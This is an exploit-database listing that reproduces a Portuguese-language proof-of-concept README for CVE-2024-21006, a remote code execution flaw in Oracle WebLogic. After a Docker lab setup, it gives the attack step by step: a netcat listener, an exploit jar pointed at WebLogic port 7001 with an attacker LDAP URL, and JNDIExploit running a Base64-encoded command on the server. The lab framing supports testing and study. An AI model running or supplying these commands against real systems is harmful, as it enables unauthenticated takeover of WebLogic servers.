Exploit for Missing Authentication for Critical Function in Oracle Weblogic_Server CVE-2024-21006

Name: Exploit for Missing Authentication for Critical Function in Oracle Weblogic_Server CVE-2024-21006
Rating: 5 (168 reviews)
2025-06-06 | CVSS 7.5
## https://sploitus.com/exploit?id=34E0A7E4-7C89-515B-8E0A-E433400EECC4
# CVE-2024-21006 PoC

A CVE-2024-21006 é uma vulnerabilidade de Remote Code Execution (RCE) crítica que afeta o Oracle WebLogic Server. A falha está relacionada ao uso inseguro do protocolo IIOP (Internet Inter-ORB Protocol) e JNDI (Java Naming and Directory Interface), permitindo que um invasor remoto não autenticado execute código arbitrário no servidor afetado, por meio de uma referência maliciosa JNDI.

## Deploy do Laboratório

Monte o ambiente:
```
docker-compose up -d
```

Para acessar Shell do Kali:
```
docker exec -it cve-2024-21006_poc-kali-1 /bin/bash
```

Para acessar Shell do WebLogic:
```
docker exec -it cve-2024-21006_poc-weblogic-1 /bin/bash
```

Para acessar Shell do ExploitBox:
```
docker exec -it exploitbox /bin/bash
```

Nesta etapa, temos uma instância do WebLogic 12.2.1.3.0 executando localmente: 
http://127.0.0.1:7001/console/login/LoginForm.jsp

![](./image/08.png)

## Explorando Lab

### PoC simples:

No Kali:
```
nc -vnlp 1389
```

No ExploitBox:
```
java -jar CVE-2024-21006.jar <IP do WebLogic> 7001 ldap://<IP do Kali>:1389
```

Veja que o Kali recebeu a conexão vinda do WebLogic:

![](./image/03.png)

### Obtendo RCE:

No Kali, inicie o JNDIExploit:
```
cd /exploit
```
```
java \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xalan.internal.xsltc=ALL-UNNAMED \
--add-exports java.xml/com.sun.org.apache.xml.internal.serializer=ALL-UNNAMED \
-jar JNDIExploit/JNDIExploit-1.3-SNAPSHOT.jar -i <IP do Kali>
```
![](./image/04.png)

No ExploitBox, execute o exploit:
```
java -jar CVE-2024-21006.jar <IP do WebLogic> 7001 "ldap://<IP do Kali>:1389/Basic/Command/Base64/<Comando em Base64>"
```
![](./image/05.png)

No Kali, veja que recebemos o request:

![](./image/06.png)

No WebLogic, veja que o comando foi executado e o arquivo foi criado com sucesso:

![](./image/07.png)

## Referências:
- https://github.com/lightr3d/CVE-2024-21006_jar
- https://github.com/momika233/CVE-2024-21006
- https://blog.csdn.net/zwy15288408160/article/details/138189146
- https://blog.csdn.net/m0_46109609/article/details/114373594